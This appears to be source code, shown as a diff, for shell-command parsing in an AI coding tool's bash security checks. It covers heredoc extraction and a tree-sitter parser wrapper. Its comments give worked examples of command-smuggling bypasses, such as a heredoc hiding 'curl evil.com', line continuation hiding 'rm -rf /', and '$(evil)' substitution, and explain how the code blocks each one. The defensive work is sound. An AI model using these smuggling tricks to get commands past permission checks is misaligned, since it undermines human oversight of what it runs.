* Checks if an operator is a command separator that starts a new command context.
* After these operators, environment variable assignments are valid again.
*/
function isCommandSeparator(op: string): boolean {
return op === '&&' || op === '||' || op === ';'
}
/**
* Type guard to check if a parsed entry is an operator
*/
function isOperator(entry: unknown, op?: string): entry is { op: string } {
if (!entry || typeof entry !== 'object' || !('op' in entry)) {
return false
}
return op ? entry.op === op : true
}
/**
* Checks if a command contains bash control structures that shell-quote cannot parse.
* These include for/while/until/if/case/select loops and conditionals.
* We match keywords followed by whitespace to avoid false positives with commands
* or arguments that happen to contain these words.
*/
function containsControlStructure(command: string): boolean {
return /\b(for|while|until|if|case|select)\s/.test(command)
}
/**
* Quotes a command and adds `< /dev/null` as a shell redirect on eval, rather than
* as an eval argument. This is critical for pipe commands where we can't parse the
* pipe boundary (e.g., commands with $(), backticks, or control structures).
*
* Using `singleQuoteForEval(cmd) + ' < /dev/null'` produces: eval 'cmd' < /dev/null
* → eval's stdin is /dev/null, eval evaluates 'cmd', pipes inside work correctly
*
* The previous approach `quote([cmd, '<', '/dev/null'])` produced: eval 'cmd' \< /dev/null
* → eval concatenates args to 'cmd < /dev/null', redirect applies to LAST pipe command
*/
function quoteWithEvalStdinRedirect(command: string): string {
return singleQuoteForEval(command) + ' < /dev/null'
}
/**
* Single-quote a string for use as an eval argument. Escapes embedded single
* quotes via '"'"' (close-sq, literal-sq-in-dq, reopen-sq). Used instead of
* shell-quote's quote() which switches to double-quote mode when the input
* contains single quotes and then escapes ! -> \!, corrupting jq/awk filters
* like `select(.x != .y)` into `select(.x \!= .y)`.
*/
function singleQuoteForEval(s: string): string {
return "'" + s.replace(/'/g, `'"'"'`) + "'"
}
/**
* Joins shell continuation lines (backslash-newline) into a single line.
* Only joins when there's an odd number of backslashes before the newline
* (the last one escapes the newline). Even backslashes pair up as escape
* sequences and the newline remains a separator.
*/
function joinContinuationLines(command: string): string {
return command.replace(/\\+\n/g, match => {
const backslashCount = match.length - 1 // -1 for the newline
if (backslashCount % 2 === 1) {
// Odd number: last backslash escapes the newline (line continuation)
return '\\'.repeat(backslashCount - 1)
} else {
// Even number: all pair up, newline is a real separator
return match
}
})
}
File diff suppressed because it is too large Load Diff
+733
View File
@@ -0,0 +1,733 @@
/**
* Heredoc extraction and restoration utilities.
*
* The shell-quote library parses `<<` as two separate `<` redirect operators,
* which breaks command splitting for heredoc syntax. This module provides
* utilities to extract heredocs before parsing and restore them after.
*
* Supported heredoc variations:
* - <<WORD - basic heredoc
* - <<'WORD' - single-quoted delimiter (no variable expansion in content)
* - <<"WORD" - double-quoted delimiter (with variable expansion)
* - <<-WORD - dash prefix (strips leading tabs from content)
* - <<-'WORD' - combined dash and quoted delimiter
*
* Known limitations:
* - Heredocs inside backtick command substitution may not be extracted
* - Very complex multi-heredoc scenarios may not be extracted
*
* When extraction fails, the command passes through unchanged. This is safe
* because the unextracted heredoc will either cause shell-quote parsing to fail
* (falling back to treating the whole command as one unit) or require manual
* approval for each apparent subcommand.
*
* @module
*/
import { randomBytes } from 'crypto'
const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
const HEREDOC_PLACEHOLDER_SUFFIX = '__'
/**
* Generates a random hex string for placeholder uniqueness.
* This prevents collision when command text literally contains "__HEREDOC_N__".
*/
function generatePlaceholderSalt(): string {
// Generate 8 random bytes as hex (16 characters)
return randomBytes(8).toString('hex')
}
/**
* Regex pattern for matching heredoc start syntax.
*
* Two alternatives handle quoted vs unquoted delimiters differently:
*
* Alternative 1 (quoted): (['"]) (\\?\w+) \2
* Captures the opening quote, then the delimiter word (which MAY include a
* leading backslash since it's literal inside quotes), then the closing quote.
* In bash, single quotes make EVERYTHING literal including backslashes:
* <<'\EOF' → delimiter is \EOF (with backslash)
* <<'EOF' → delimiter is EOF
* Double quotes also preserve backslashes before non-special chars:
* <<"\EOF" → delimiter is \EOF
*
* Alternative 2 (unquoted): \\?(\w+)
* Optionally consumes a leading backslash (escape), then captures the word.
* In bash, an unquoted backslash escapes the next character:
* <<\EOF → delimiter is EOF (backslash consumed as escape)
* <<EOF → delimiter is EOF (plain)
*
* SECURITY: The backslash MUST be inside the capture group for quoted
* delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
* the capture group unconditionally, causing <<'\EOF' to extract delimiter
* "EOF" while bash uses "\EOF", allowing command smuggling.
*
* Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
* a security issue (could hide commands between << and the delimiter).
*/
const HEREDOC_START_PATTERN =
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
/(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
export type HeredocInfo = {
/** The full heredoc text including << operator, delimiter, content, and closing delimiter */
fullText: string
/** The delimiter word (without quotes) */
delimiter: string
/** Start position of the << operator in the original command */
operatorStartIndex: number
/** End position of the << operator (exclusive) - content on same line after this is preserved */
operatorEndIndex: number
/** Start position of heredoc content (the newline before content) */
contentStartIndex: number
/** End position of heredoc content including closing delimiter (exclusive) */
contentEndIndex: number
}
export type HeredocExtractionResult = {
/** The command with heredocs replaced by placeholders */
processedCommand: string
/** Map of placeholder string to original heredoc info */
heredocs: Map<string, HeredocInfo>
}
/**
* Extracts heredocs from a command string and replaces them with placeholders.
*
* This allows shell-quote to parse the command without mangling heredoc syntax.
* After parsing, use `restoreHeredocs` to replace placeholders with original content.
*
* @param command - The shell command string potentially containing heredocs
* @returns Object containing the processed command and a map of placeholders to heredoc info
*
* @example
* ```ts
* const result = extractHeredocs(`cat <<EOF
* hello world
* EOF`);
* // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
* // result.heredocs has the mapping to restore later
* ```
*/
export function extractHeredocs(
command: string,
options?: { quotedOnly?: boolean },
): HeredocExtractionResult {
const heredocs = new Map<string, HeredocInfo>()
// Quick check: if no << present, skip processing
if (!command.includes('<<')) {
return { processedCommand: command, heredocs }
}
// Security: Paranoid pre-validation. Our incremental quote/comment scanner
// (see advanceScan below) does simplified parsing that cannot handle all
// bash quoting constructs. If the command contains
// constructs that could desync our quote tracking, bail out entirely
// rather than risk extracting a heredoc with incorrect boundaries.
// This is defense-in-depth: each construct below has caused or could
// cause a security bypass if we attempt extraction.
//
// Specifically, we bail if the command contains:
// 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
// doesn't handle the $ prefix, would misparse the quotes)
// 2. Backtick command substitution (backtick nesting has complex parsing
// rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
// make_cmd.c:606, enabling early heredoc closure that our parser
// can't replicate)
if (/\$['"]/.test(command)) {
return { processedCommand: command, heredocs }
}
// Check for backticks in the command text before the first <<.
// Backtick nesting has complex parsing rules, and backtick acts as
// shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
// heredoc closure that our parser can't replicate. We only check
// before << because backticks in heredoc body content are harmless.
const firstHeredocPos = command.indexOf('<<')
if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
return { processedCommand: command, heredocs }
}
// Security: Check for arithmetic evaluation context before the first `<<`.
// In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
// heredoc. If we mis-extract it, subsequent lines become "heredoc content"
// and are hidden from security validators, while bash executes them as
// separate commands. We bail entirely if `((` appears before `<<` without
// a matching `))` — we can't reliably distinguish arithmetic `<<` from
// heredoc `<<` in that context. Note: $(( is already caught by
// validateDangerousPatterns, but bare (( is not.
if (firstHeredocPos > 0) {
const beforeHeredoc = command.slice(0, firstHeredocPos)
// Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
if (openArith > closeArith) {
return { processedCommand: command, heredocs }
}
}
// Create a global version of the pattern for iteration
const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
const heredocMatches: HeredocInfo[] = []
// Security: When quotedOnly skips an unquoted heredoc, we still need to
// track its content range so the nesting filter can reject quoted heredocs
// that appear INSIDE the skipped unquoted heredoc's body. Without this,
// `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
// top-level heredoc, hiding $(evil) from validators — even though in bash,
// $(evil) IS executed (unquoted <<EOF expands its body).
const skippedHeredocRanges: Array<{
contentStartIndex: number
contentEndIndex: number
}> = []
let match: RegExpExecArray | null
// Incremental quote/comment scanner state.
//
// The regex walks forward through the command, and match.index is monotonically
// increasing. Previously, isInsideQuotedString and isInsideComment each
// re-scanned from position 0 on every match — O(n²) when the heredoc body
// contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
// heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
// calls extractHeredocs multiple times per command.
//
// Instead, track quote/comment/escape state incrementally and advance from
// the last scanned position. This preserves the OLD helpers' exact semantics:
//
// Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
// `#` and never skips characters for being "in a comment". Inside single
// quotes, everything is literal. Inside double quotes, backslash escapes
// the next char. An unquoted backslash run of odd length escapes the next
// char.
//
// Comment state (was isInsideComment) observes quote state (# inside quotes
// is not a comment) but NOT the reverse. The old helper used a per-call
// `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
// equivalently, any physical `\n` clears comment state — including `\n`
// inside quotes (since lastIndexOf was quote-blind).
//
// SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
// the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
// (where bash treats `#` as part of the word `x#`, NOT a comment) would
// report the `<<` as unquoted and EXTRACT it — hiding content from security
// validators. The old isInsideQuotedString was comment-blind; we preserve
// that. Both old and new over-eagerly treat any unquoted `#` as a comment
// (bash requires word-start), but since quote tracking is independent, the
// over-eagerness only affects the comment check — causing SKIPS (safe
// direction), never extra EXTRACTIONS.
let scanPos = 0
let scanInSingleQuote = false
let scanInDoubleQuote = false
let scanInComment = false
// Inside "...": true if the previous char was a backslash (next char is escaped).
// Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
// the char at scanPos.
let scanDqEscapeNext = false
// Unquoted context: length of the consecutive backslash run ending at scanPos-1.
// Used to determine if the char at scanPos is escaped (odd run = escaped).
let scanPendingBackslashes = 0
const advanceScan = (target: number): void => {
for (let i = scanPos; i < target; i++) {
const ch = command[i]!
// Any physical newline clears comment state. The old isInsideComment
// used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
// `\n` inside quotes still advanced lineStart. Match that here by
// clearing BEFORE the quote branches.
if (ch === '\n') scanInComment = false
if (scanInSingleQuote) {
if (ch === "'") scanInSingleQuote = false
continue
}
if (scanInDoubleQuote) {
if (scanDqEscapeNext) {
scanDqEscapeNext = false
continue
}
if (ch === '\\') {
scanDqEscapeNext = true
continue
}
if (ch === '"') scanInDoubleQuote = false
continue
}
// Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
// isInsideQuotedString): we do NOT skip chars for being inside a
// comment. Only the `#` detection itself is gated on not-in-comment.
if (ch === '\\') {
scanPendingBackslashes++
continue
}
const escaped = scanPendingBackslashes % 2 === 1
scanPendingBackslashes = 0
if (escaped) continue
if (ch === "'") scanInSingleQuote = true
else if (ch === '"') scanInDoubleQuote = true
else if (!scanInComment && ch === '#') scanInComment = true
}
scanPos = target
}
while ((match = heredocStartPattern.exec(command)) !== null) {
const startIndex = match.index
// Advance the incremental scanner to this match's position. After this,
// scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
// state immediately BEFORE startIndex, and scanPendingBackslashes is the
// count of unquoted `\` immediately preceding startIndex.
advanceScan(startIndex)
// Skip if this << is inside a quoted string (not a real heredoc operator).
if (scanInSingleQuote || scanInDoubleQuote) {
continue
}
// Security: Skip if this << is inside a comment (after unquoted #).
// In bash, `# <<EOF` is a comment — extracting it would hide commands on
// subsequent lines as "heredoc content" while bash executes them.
if (scanInComment) {
continue
}
// Security: Skip if this << is preceded by an odd number of backslashes.
// In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
// is input redirection. Extracting it would drop same-line commands from
// security checks. The scanner tracks the unquoted backslash run ending
// immediately before startIndex (scanPendingBackslashes).
if (scanPendingBackslashes % 2 === 1) {
continue
}
// Security: Bail if this `<<` falls inside the body of a previously
// SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
// `<<` inside a heredoc body is just text — it's not a nested heredoc
// operator. Extracting it would hide content that bash actually expands.
let insideSkipped = false
for (const skipped of skippedHeredocRanges) {
if (
startIndex > skipped.contentStartIndex &&
startIndex < skipped.contentEndIndex
) {
insideSkipped = true
break
}
}
if (insideSkipped) {
continue
}
const fullMatch = match[0]
const isDash = match[1] === '-'
// Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
const delimiter = (match[3] || match[4])!
const operatorEndIndex = startIndex + fullMatch.length
// Security: Two checks to verify our regex captured the full delimiter word.
// Any mismatch between our parsed delimiter and bash's actual delimiter
// could allow command smuggling past permission checks.
// Check 1: If a quote was captured (group 2), verify the closing quote
// was actually matched by \2 in the regex (the quoted alternative requires
// the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
// non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
// early, leaving the closing quote unmatched.
// Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
// should be "EO F" but we'd use "EO". Skip to prevent mismatch.
const quoteChar = match[2]
if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
continue
}
// Security: Determine if the delimiter is quoted ('EOF', "EOF") or
// escaped (\EOF). In bash, quoted/escaped delimiters suppress all
// expansion in the heredoc body — content is literal text. Unquoted
// delimiters (<<EOF) perform full shell expansion: $(), backticks,
// and ${} in the body ARE executed. When quotedOnly is set, skip
// unquoted heredocs so their bodies remain visible to security
// validators (they may contain executable command substitutions).
const isEscapedDelimiter = fullMatch.includes('\\')
const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
// Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
// set. Instead, we compute their content range and add them to
// skippedHeredocRanges, then skip them AFTER finding the closing
// delimiter. This lets the nesting filter correctly reject quoted
// "heredocs" that appear inside unquoted heredoc bodies.
// Check 2: Verify the next character after our match is a bash word
// terminator (metacharacter or end of string). Characters like word chars,
// quotes, $, \ mean the bash word extends beyond our match
// (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
// IMPORTANT: Only match bash's actual metacharacters — space (0x20),
// tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
// also matches \r, \f, \v, and Unicode whitespace that bash treats as
// regular word characters, not terminators.
if (operatorEndIndex < command.length) {
const nextChar = command[operatorEndIndex]!
if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
continue
}
}
// In bash, heredoc content starts on the NEXT LINE after the operator.
// Any content on the same line after <<EOF (like " && echo done") is part
// of the command, not the heredoc content.
//
// SECURITY: The "same line" must be the LOGICAL command line, not the
// first physical newline. Multi-line quoted strings extend the logical
// line — bash waits for the quote to close before starting to read the
// heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
// quoted strings, causing the body to start too early.
//
// Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
// - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
// - Bash: waits for `'` to close → logical line is
// `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
// - Our old code: indexOf('\n') finds the quoted newline → body starts
// at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
// NEVER reaches permission checks.
//
// Fix: scan forward from operatorEndIndex using quote-state tracking,
// finding the first newline that's NOT inside a quoted string. Same
// quote-tracking semantics as advanceScan (already used to validate
// the `<<` operator position above).
let firstNewlineOffset = -1
{
let inSingleQuote = false
let inDoubleQuote = false
// We start with clean quote state — advanceScan already rejected the
// case where the `<<` operator itself is inside a quote.
for (let k = operatorEndIndex; k < command.length; k++) {
const ch = command[k]
if (inSingleQuote) {
if (ch === "'") inSingleQuote = false
continue
}
if (inDoubleQuote) {
if (ch === '\\') {
k++ // skip escaped char inside double quotes
continue
}
if (ch === '"') inDoubleQuote = false
continue
}
// Unquoted context
if (ch === '\n') {
firstNewlineOffset = k - operatorEndIndex
break
}
// Count backslashes for escape detection in unquoted context
let backslashCount = 0
for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
backslashCount++
}
if (backslashCount % 2 === 1) continue // escaped char
if (ch === "'") inSingleQuote = true
else if (ch === '"') inDoubleQuote = true
}
// If we ended while still inside a quote, the logical line never ends —
// there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
}
// If no unquoted newline found, this heredoc has no content - skip it
if (firstNewlineOffset === -1) {
continue
}
// Security: Check for backslash-newline continuation at the end of the
// same-line content (text between the operator and the newline). In bash,
// `\<newline>` joins lines BEFORE heredoc parsing — so:
// cat <<'EOF' && \
// rm -rf /
// content
// EOF
// bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
// then heredoc body = `content`. Our extractor runs BEFORE continuation
// joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
// hiding it from all validators. Bail if same-line content ends with an
// odd number of backslashes.
const sameLineContent = command.slice(
operatorEndIndex,
operatorEndIndex + firstNewlineOffset,
)
let trailingBackslashes = 0
for (let j = sameLineContent.length - 1; j >= 0; j--) {
if (sameLineContent[j] === '\\') {
trailingBackslashes++
} else {
break
}
}
if (trailingBackslashes % 2 === 1) {
// Odd number of trailing backslashes → last one escapes the newline
// → this is a line continuation. Our heredoc-before-continuation order
// would misparse this. Bail out.
continue
}
const contentStartIndex = operatorEndIndex + firstNewlineOffset
const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
const contentLines = afterNewline.split('\n')
// Find the closing delimiter - must be on its own line
// Security: Must match bash's exact behavior to prevent parsing discrepancies
// that could allow command smuggling past permission checks.
let closingLineIndex = -1
for (let i = 0; i < contentLines.length; i++) {
const line = contentLines[i]!
if (isDash) {
// <<- strips leading TABS only (not spaces), per POSIX/bash spec.
// The line after stripping leading tabs must be exactly the delimiter.
const stripped = line.replace(/^\t*/, '')
if (stripped === delimiter) {
closingLineIndex = i
break
}
} else {
// << requires the closing delimiter to be exactly alone on the line
// with NO leading or trailing whitespace. This matches bash behavior.
if (line === delimiter) {
closingLineIndex = i
break
}
}
// Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
// Inside $(), ${}, or backtick substitution, bash closes a heredoc when
// a line STARTS with the delimiter and contains the shell_eof_token
// (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
// line matching, so this discrepancy could hide smuggled commands.
//
// Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
// >) after the delimiter, which could indicate command syntax from a
// parsing discrepancy we haven't identified.
//
// For <<- heredocs, bash strips leading tabs before this check.
const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
if (
eofCheckLine.length > delimiter.length &&
eofCheckLine.startsWith(delimiter)
) {
const charAfterDelimiter = eofCheckLine[delimiter.length]!
if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
// Shell metacharacter or substitution closer after delimiter —
// bash may close the heredoc early here. Bail out.
closingLineIndex = -1
break
}
}
}
// Security: If quotedOnly mode is set and this is an unquoted heredoc,
// record its content range for nesting checks but do NOT add it to
// heredocMatches. This ensures quoted "heredocs" inside its body are
// correctly rejected by the insideSkipped check on subsequent iterations.
//
// CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
// unquoted heredoc has no closing delimiter, bash still treats everything
// to end-of-input as the heredoc body (and expands $() within it). We
// must block extraction of any subsequent quoted "heredoc" that falls
// inside that unbounded body.
if (options?.quotedOnly && !isQuotedOrEscaped) {
let skipContentEndIndex: number
if (closingLineIndex === -1) {
// No closing delimiter — in bash, heredoc body extends to end of
// input. Track the entire remaining range as "skipped body".
skipContentEndIndex = command.length
} else {
const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
const skipContentLength = skipLinesUpToClosing.join('\n').length
skipContentEndIndex = contentStartIndex + 1 + skipContentLength
}
skippedHeredocRanges.push({
contentStartIndex,
contentEndIndex: skipContentEndIndex,
})
continue
}
// If no closing delimiter found, this is malformed - skip it
if (closingLineIndex === -1) {
continue
}
// Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
const contentLength = linesUpToClosing.join('\n').length
const contentEndIndex = contentStartIndex + 1 + contentLength
// Security: Bail if this heredoc's content range OVERLAPS with any
// previously-skipped heredoc's content range. This catches the case where
// two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
// is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
// share a line, their bodies appear SEQUENTIALLY (first's body, then
// second's). Both compute contentStartIndex from the SAME newline, so the
// second's body search walks through the first's body. For:
// cat <<EOF <<'SAFE'
// $(evil_command)
// EOF
// safe body
// SAFE
// ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
// swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
// <<EOF's expansion) into the placeholder, hiding it from validators.
//
// The insideSkipped check above doesn't catch this because the quoted
// operator's startIndex is on the command line BEFORE contentStart.
// The contentStartPositions dedup check below doesn't catch it because the
// skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
let overlapsSkipped = false
for (const skipped of skippedHeredocRanges) {
// Ranges [a,b) and [c,d) overlap iff a < d && c < b
if (
contentStartIndex < skipped.contentEndIndex &&
skipped.contentStartIndex < contentEndIndex
) {
overlapsSkipped = true
break
}
}
if (overlapsSkipped) {
continue
}
// Build fullText: operator + newline + content (normalized form for restoration)
// This creates a clean heredoc that can be restored correctly
const operatorText = command.slice(startIndex, operatorEndIndex)
const contentText = command.slice(contentStartIndex, contentEndIndex)
const fullText = operatorText + contentText
heredocMatches.push({
fullText,
delimiter,
operatorStartIndex: startIndex,
operatorEndIndex,
contentStartIndex,
contentEndIndex,
})
}
// If no valid heredocs found, return original
if (heredocMatches.length === 0) {
return { processedCommand: command, heredocs }
}
// Filter out nested heredocs - any heredoc whose operator starts inside
// another heredoc's content range should be excluded.
// This prevents corruption when heredoc content contains << patterns.
const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
// Check if this candidate's operator is inside any other heredoc's content
for (const other of all) {
if (candidate === other) continue
// Check if candidate's operator starts within other's content range
if (
candidate.operatorStartIndex > other.contentStartIndex &&
candidate.operatorStartIndex < other.contentEndIndex
) {
// This heredoc is nested inside another - filter it out
return false
}
}
return true
})
// If filtering removed all heredocs, return original
if (topLevelHeredocs.length === 0) {
return { processedCommand: command, heredocs }
}
// Check for multiple heredocs sharing the same content start position
// (i.e., on the same line). This causes index corruption during replacement
// because indices are calculated on the original string but applied to
// a progressively modified string. Return without extraction - the fallback
// is safe (requires manual approval or fails parsing).
const contentStartPositions = new Set(
topLevelHeredocs.map(h => h.contentStartIndex),
)
if (contentStartPositions.size < topLevelHeredocs.length) {
return { processedCommand: command, heredocs }
}
// Sort by content end position descending so we can replace from end to start
// (this preserves indices for earlier replacements)
topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
// Generate a unique salt for this extraction to prevent placeholder collisions
// with literal "__HEREDOC_N__" text in commands
const salt = generatePlaceholderSalt()
let processedCommand = command
topLevelHeredocs.forEach((info, index) => {
// Use reverse index since we sorted descending
const placeholderIndex = topLevelHeredocs.length - 1 - index
const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
heredocs.set(placeholder, info)
// Replace heredoc with placeholder while preserving same-line content:
// - Keep everything before the operator
// - Replace operator with placeholder
// - Keep content between operator and heredoc content (e.g., " && echo done")
// - Remove the heredoc content (from newline through closing delimiter)
// - Keep everything after the closing delimiter
processedCommand =
processedCommand.slice(0, info.operatorStartIndex) +
placeholder +
processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
processedCommand.slice(info.contentEndIndex)
})
return { processedCommand, heredocs }
}
/**
* Restores heredoc placeholders back to their original content in a single string.
* Internal helper used by restoreHeredocs.
*/
function restoreHeredocsInString(
text: string,
heredocs: Map<string, HeredocInfo>,
): string {
let result = text
for (const [placeholder, info] of heredocs) {
result = result.replaceAll(placeholder, info.fullText)
}
return result
}
/**
* Restores heredoc placeholders in an array of strings.
*
* @param parts - Array of strings that may contain heredoc placeholders
* @param heredocs - The map of placeholders from `extractHeredocs`
* @returns New array with placeholders replaced by original heredoc content
*/
export function restoreHeredocs(
parts: string[],
heredocs: Map<string, HeredocInfo>,
): string[] {
if (heredocs.size === 0) {
return parts
}
return parts.map(part => restoreHeredocsInString(part, heredocs))
}
/**
* Checks if a command contains heredoc syntax.
*
* This is a quick check that doesn't validate the heredoc is well-formed,
* just that the pattern exists.
*
* @param command - The shell command string
* @returns true if the command appears to contain heredoc syntax
*/
export function containsHeredoc(command: string): boolean {
return HEREDOC_START_PATTERN.test(command)
}
+230
View File
@@ -0,0 +1,230 @@
import { feature } from 'bun:bundle'
import { logEvent } from '../../services/analytics/index.js'
import { logForDebugging } from '../debug.js'
import {
ensureParserInitialized,
getParserModule,
type TsNode,
} from './bashParser.js'
export type Node = TsNode
export interface ParsedCommandData {
rootNode: Node
envVars: string[]
commandNode: Node | null
originalCommand: string
}
const MAX_COMMAND_LENGTH = 10000
const DECLARATION_COMMANDS = new Set([
'export',
'declare',
'typeset',
'readonly',
'local',
'unset',
'unsetenv',
])
const ARGUMENT_TYPES = new Set(['word', 'string', 'raw_string', 'number'])
const SUBSTITUTION_TYPES = new Set([
'command_substitution',
'process_substitution',
])
const COMMAND_TYPES = new Set(['command', 'declaration_command'])
let logged = false
function logLoadOnce(success: boolean): void {
if (logged) return
logged = true
logForDebugging(
success ? 'tree-sitter: native module loaded' : 'tree-sitter: unavailable',
)
logEvent('tengu_tree_sitter_load', { success })
}
/**
* Awaits WASM init (Parser.init + Language.load). Must be called before
* parseCommand/parseCommandRaw for the parser to be available. Idempotent.
*/
export async function ensureInitialized(): Promise<void> {
if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
await ensureParserInitialized()
}
}
export async function parseCommand(
command: string,
): Promise<ParsedCommandData | null> {
if (!command || command.length > MAX_COMMAND_LENGTH) return null
// Gate: ant-only until pentest. External builds fall back to legacy
// regex/shell-quote path. Guarding the whole body inside the positive
// branch lets Bun DCE the NAPI import AND keeps telemetry honest — we
// only fire tengu_tree_sitter_load when a load was genuinely attempted.
if (feature('TREE_SITTER_BASH')) {
await ensureParserInitialized()
const mod = getParserModule()
logLoadOnce(mod !== null)
if (!mod) return null
try {
const rootNode = mod.parse(command)
if (!rootNode) return null
const commandNode = findCommandNode(rootNode, null)
const envVars = extractEnvVars(commandNode)
return { rootNode, envVars, commandNode, originalCommand: command }
} catch {
return null
}
}
return null
}
/**
* SECURITY: Sentinel for "parser was loaded and attempted, but aborted"
* (timeout / node budget / Rust panic). Distinct from `null` (module not
* loaded). Adversarial input can trigger abort under MAX_COMMAND_LENGTH:
* `(( a[0][0]... ))` with ~2800 subscripts hits PARSE_TIMEOUT_MICROS.
* Callers MUST treat this as fail-closed (too-complex), NOT route to legacy.
*/
export const PARSE_ABORTED = Symbol('parse-aborted')
/**
* Raw parse — skips findCommandNode/extractEnvVars which the security
* walker in ast.ts doesn't use. Saves one tree walk per bash command.
*
* Returns:
* - Node: parse succeeded
* - null: module not loaded / feature off / empty / over-length
* - PARSE_ABORTED: module loaded but parse failed (timeout/panic)
*/
export async function parseCommandRaw(
command: string,
): Promise<Node | null | typeof PARSE_ABORTED> {
if (!command || command.length > MAX_COMMAND_LENGTH) return null
if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
await ensureParserInitialized()
const mod = getParserModule()
logLoadOnce(mod !== null)
if (!mod) return null
try {
const result = mod.parse(command)
// SECURITY: Module loaded; null here = timeout/node-budget abort in
// bashParser.ts (PARSE_TIMEOUT_MS=50, MAX_NODES=50_000).
// Previously collapsed into `return null` → parse-unavailable → legacy
// path, which lacks EVAL_LIKE_BUILTINS — `trap`, `enable`, `hash` leaked.
if (result === null) {
logEvent('tengu_tree_sitter_parse_abort', {
cmdLength: command.length,
panic: false,
})
return PARSE_ABORTED
}
return result
} catch {
logEvent('tengu_tree_sitter_parse_abort', {
cmdLength: command.length,
panic: true,
})
return PARSE_ABORTED
}
}
return null
}
function findCommandNode(node: Node, parent: Node | null): Node | null {
const { type, children } = node
if (COMMAND_TYPES.has(type)) return node
// Variable assignment followed by command
if (type === 'variable_assignment' && parent) {
return (
parent.children.find(
c => COMMAND_TYPES.has(c.type) && c.startIndex > node.startIndex,
) ?? null
)
}
// Pipeline: recurse into first child (which may be a redirected_statement)
if (type === 'pipeline') {
for (const child of children) {
const result = findCommandNode(child, node)
if (result) return result
}
return null
}
// Redirected statement: find the command inside
if (type === 'redirected_statement') {
return children.find(c => COMMAND_TYPES.has(c.type)) ?? null
}
// Recursive search
for (const child of children) {
const result = findCommandNode(child, node)
if (result) return result
}
return null
}
function extractEnvVars(commandNode: Node | null): string[] {
if (!commandNode || commandNode.type !== 'command') return []
const envVars: string[] = []
for (const child of commandNode.children) {
if (child.type === 'variable_assignment') {
envVars.push(child.text)
} else if (child.type === 'command_name' || child.type === 'word') {
break
}
}
return envVars
}
export function extractCommandArguments(commandNode: Node): string[] {
// Declaration commands
if (commandNode.type === 'declaration_command') {
const firstChild = commandNode.children[0]
return firstChild && DECLARATION_COMMANDS.has(firstChild.text)
? [firstChild.text]
: []
}
const args: string[] = []
let foundCommandName = false
for (const child of commandNode.children) {
